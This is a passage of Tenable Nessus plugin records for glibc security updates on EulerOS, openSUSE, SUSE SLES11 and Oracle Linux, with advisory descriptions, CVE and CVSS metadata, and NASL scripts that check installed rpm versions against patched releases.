2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/sp"); script_exclude_keys("Host/EulerOS/uvp_version"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/EulerOS/release"); if (isnull(release) \|\| release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS"); if (release !~ "^EulerOS release 2\.0(\D\|$)") audit(AUDIT_OS_NOT, "EulerOS 2.0"); sp = get_kb_item("Host/EulerOS/sp"); if (isnull(sp) \|\| sp !~ "^(2)$") audit(AUDIT_OS_NOT, "EulerOS 2.0 SP2"); uvp = get_kb_item("Host/EulerOS/uvp_version"); if (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, "EulerOS 2.0 SP2", "EulerOS UVP " + uvp); if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu); flag = 0; pkgs = ["glibc-2.17-111.h27", "glibc-common-2.17-111.h27", "glibc-devel-2.17-111.h27", "glibc-headers-2.17-111.h27", "glibc-static-2.17-111.h27", "glibc-utils-2.17-111.h27", "nscd-2.17-111.h27"]; foreach (pkg in pkgs) if (rpm_check(release:"EulerOS-2.0", sp:"2", reference:pkg)) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc"); }

NASL family	SuSE Local Security Checks
NASL id	OPENSUSE-2018-30.NASL
description	This update for glibc fixes the following issues : - A privilege escalation bug in the realpath() function has been fixed. [CVE-2018-1000001, bsc#1074293] - A memory leak and a buffer overflow in the dynamic ELF loader has been fixed. [CVE-2017-1000408, CVE-2017-1000409, bsc#1071319] - An issue in the code handling RPATHs was fixed that could have been exploited by an attacker to execute code loaded from arbitrary libraries. [CVE-2017-16997, bsc#1073231] - A potential crash caused by a use-after-free bug in pthread_create() has been fixed. [bsc#1053188] - A bug that prevented users to build shared objects which use the optimized libmvec.so API has been fixed. [bsc#1070905] - A memory leak in the glob() function has been fixed. [CVE-2017-15670, CVE-2017-15671, CVE-2017-15804, bsc#1064569, bsc#1064580, bsc#1064583] - A bug that would lose the syscall error code value in case of crashes has been fixed. [bsc#1063675] This update was imported from the SUSE:SLE-12-SP2:Update update project.
last seen	2020-06-05
modified	2018-01-16
plugin id	106059
published	2018-01-16
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106059
title	openSUSE Security Update : glibc (openSUSE-2018-30)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2018-30. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(106059); script_version("3.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-1000408", "CVE-2017-1000409", "CVE-2017-15670", "CVE-2017-15671", "CVE-2017-15804", "CVE-2017-16997", "CVE-2018-1000001"); script_name(english:"openSUSE Security Update : glibc (openSUSE-2018-30)"); script_summary(english:"Check for the openSUSE-2018-30 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update for glibc fixes the following issues : - A privilege escalation bug in the realpath() function has been fixed. [CVE-2018-1000001, bsc#1074293] - A memory leak and a buffer overflow in the dynamic ELF loader has been fixed. [CVE-2017-1000408, CVE-2017-1000409, bsc#1071319] - An issue in the code handling RPATHs was fixed that could have been exploited by an attacker to execute code loaded from arbitrary libraries. [CVE-2017-16997, bsc#1073231] - A potential crash caused by a use-after-free bug in pthread_create() has been fixed. [bsc#1053188] - A bug that prevented users to build shared objects which use the optimized libmvec.so API has been fixed. [bsc#1070905] - A memory leak in the glob() function has been fixed. [CVE-2017-15670, CVE-2017-15671, CVE-2017-15804, bsc#1064569, bsc#1064580, bsc#1064583] - A bug that would lose the syscall error code value in case of crashes has been fixed. [bsc#1063675] This update was imported from the SUSE:SLE-12-SP2:Update update project." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1051042" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1053188" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1063675" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1064569" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1064580" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1064583" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1070905" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1071319" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1073231" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1074293" ); script_set_attribute( attribute:"solution", value:"Update the affected glibc packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc "realpath()" Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel-static"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel-static-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-extra"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-html"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-i18ndata"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-info"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-obsolete"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-profile"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-profile-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-utils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-utils-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-utils-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:nscd"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:nscd-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.3"); script_set_attribute(attribute:"patch_publication_date", value:"2018/01/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/16"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) \|\| release =~ "^(SLED\|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.2\|SUSE42\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.2 / 42.3", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586\|i686\|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.2", reference:"glibc-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-debuginfo-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-debugsource-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-devel-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-devel-debuginfo-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-devel-static-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-extra-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-extra-debuginfo-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-html-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-i18ndata-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-info-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-locale-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-locale-debuginfo-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-obsolete-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-obsolete-debuginfo-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-profile-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-utils-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-utils-debuginfo-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"glibc-utils-debugsource-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"nscd-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"nscd-debuginfo-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"glibc-utils-32bit-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"glibc-utils-debuginfo-32bit-2.22-4.12.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-debuginfo-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-debugsource-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-devel-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-devel-debuginfo-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-devel-static-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-extra-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-extra-debuginfo-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-html-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-i18ndata-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-info-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-locale-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-locale-debuginfo-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-obsolete-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-obsolete-debuginfo-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-profile-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-utils-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-utils-debuginfo-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"glibc-utils-debugsource-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"nscd-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"nscd-debuginfo-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-debuginfo-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-devel-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-devel-debuginfo-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-devel-static-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-locale-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-locale-debuginfo-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-profile-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-utils-32bit-2.22-10.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"glibc-utils-debuginfo-32bit-2.22-10.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc-utils / glibc-utils-32bit / glibc-utils-debuginfo / etc"); }

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2018-0565-1.NASL
description	This update for glibc fixes the following issues: Security issues : - CVE-2017-8804: Fix memory leak after deserialization failure in xdr_bytes, xdr_string (bsc#1037930) - CVE-2017-12132: Reduce EDNS payload size to 1200 bytes (bsc#1051791) - CVE-2018-6485,CVE-2018-6551: Fix integer overflows in internal memalign and malloc functions (bsc#1079036) - CVE-2018-1000001: Avoid underflow of malloced area in realpath (bsc#1074293) Also a non security issue was fixed : - Do not fail if one of the two responses to AF_UNSPEC fails (bsc#978209) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	107086
published	2018-03-01
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/107086
title	SUSE SLES11 Security Update : glibc (SUSE-SU-2018:0565-1)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SUSE update advisory SUSE-SU-2018:0565-1. # The text itself is copyright (C) SUSE. # include("compat.inc"); if (description) { script_id(107086); script_version("3.5"); script_cvs_date("Date: 2019/09/10 13:51:47"); script_cve_id("CVE-2017-12132", "CVE-2017-8804", "CVE-2018-1000001", "CVE-2018-6485", "CVE-2018-6551"); script_name(english:"SUSE SLES11 Security Update : glibc (SUSE-SU-2018:0565-1)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote SUSE host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "This update for glibc fixes the following issues: Security issues : - CVE-2017-8804: Fix memory leak after deserialization failure in xdr_bytes, xdr_string (bsc#1037930) - CVE-2017-12132: Reduce EDNS payload size to 1200 bytes (bsc#1051791) - CVE-2018-6485,CVE-2018-6551: Fix integer overflows in internal memalign and malloc functions (bsc#1079036) - CVE-2018-1000001: Avoid underflow of malloced area in realpath (bsc#1074293) Also a non security issue was fixed : - Do not fail if one of the two responses to AF_UNSPEC fails (bsc#978209) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1037930" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1051791" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1074293" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1079036" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=978209" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-12132/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-8804/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2018-1000001/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2018-6485/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2018-6551/" ); # https://www.suse.com/support/update/announcement/2018/suse-su-20180565-1/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?071614de" ); script_set_attribute( attribute:"solution", value: "To install this SUSE Security Update use YaST online_update. Alternatively you can run the command listed for your product : SUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t patch sdksp4-glibc-13494=1 SUSE Linux Enterprise Server 11-SP4:zypper in -t patch slessp4-glibc-13494=1 SUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch slessp3-glibc-13494=1 SUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch sleposp3-glibc-13494=1 SUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch dbgsp4-glibc-13494=1 SUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch dbgsp3-glibc-13494=1 To bring your system up-to-date, use 'zypper patch'." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc "realpath()" Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-html"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-i18ndata"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-info"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-locale"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:glibc-profile"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:nscd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/07"); script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/03/01"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) \|\| release !~ "^(SLED\|SLES)") audit(AUDIT_OS_NOT, "SUSE"); os_ver = pregmatch(pattern: "^(SLE(S\|D)\d+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE"); os_ver = os_ver[1]; if (! preg(pattern:"^(SLES11)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES11", "SUSE " + os_ver); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu); sp = get_kb_item("Host/SuSE/patchlevel"); if (isnull(sp)) sp = "0"; if (os_ver == "SLES11" && (! preg(pattern:"^(3\|4)$", string:sp))) audit(AUDIT_OS_NOT, "SLES11 SP3/4", os_ver + " SP" + sp); flag = 0; if (rpm_check(release:"SLES11", sp:"4", cpu:"x86_64", reference:"glibc-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", cpu:"x86_64", reference:"glibc-devel-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", cpu:"x86_64", reference:"glibc-locale-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", cpu:"x86_64", reference:"glibc-profile-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", cpu:"s390x", reference:"glibc-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", cpu:"s390x", reference:"glibc-devel-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", cpu:"s390x", reference:"glibc-locale-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", cpu:"s390x", reference:"glibc-profile-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"glibc-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"glibc-devel-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"glibc-html-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"glibc-i18ndata-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"glibc-info-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"glibc-locale-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"glibc-profile-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"nscd-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"x86_64", reference:"glibc-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"x86_64", reference:"glibc-devel-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"x86_64", reference:"glibc-locale-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"x86_64", reference:"glibc-profile-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"s390x", reference:"glibc-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"s390x", reference:"glibc-devel-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"s390x", reference:"glibc-locale-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", cpu:"s390x", reference:"glibc-profile-32bit-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"glibc-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"glibc-devel-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"glibc-html-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"glibc-i18ndata-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"glibc-info-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"glibc-locale-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"glibc-profile-2.11.3-17.110.6.2")) flag++; if (rpm_check(release:"SLES11", sp:"3", reference:"nscd-2.11.3-17.110.6.2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc"); }

NASL family	Oracle Linux Local Security Checks
NASL id	ORACLELINUX_ELSA-2018-0805.NASL
description	From Red Hat Security Advisory 2018:0805 : An update for glibc is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. Security Fix(es) : * glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation (CVE-2018-1000001) * glibc: Buffer overflow in glob with GLOB_TILDE (CVE-2017-15670) * glibc: Buffer overflow during unescaping of user names with the ~ operator (CVE-2017-15804) * glibc: denial of service in getnetbyname function (CVE-2014-9402) * glibc: DNS resolver NULL pointer dereference with crafted record type (CVE-2015-5180) * glibc: Fragmentation attacks possible when EDNS0 is enabled (CVE-2017-12132) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank halfdog for reporting CVE-2018-1000001. The CVE-2015-5180 issue was discovered by Florian Weimer (Red Hat Product Security). Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section.
last seen	2020-06-01
modified	2020-06-02
plugin id	109105
published	2018-04-18
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/109105
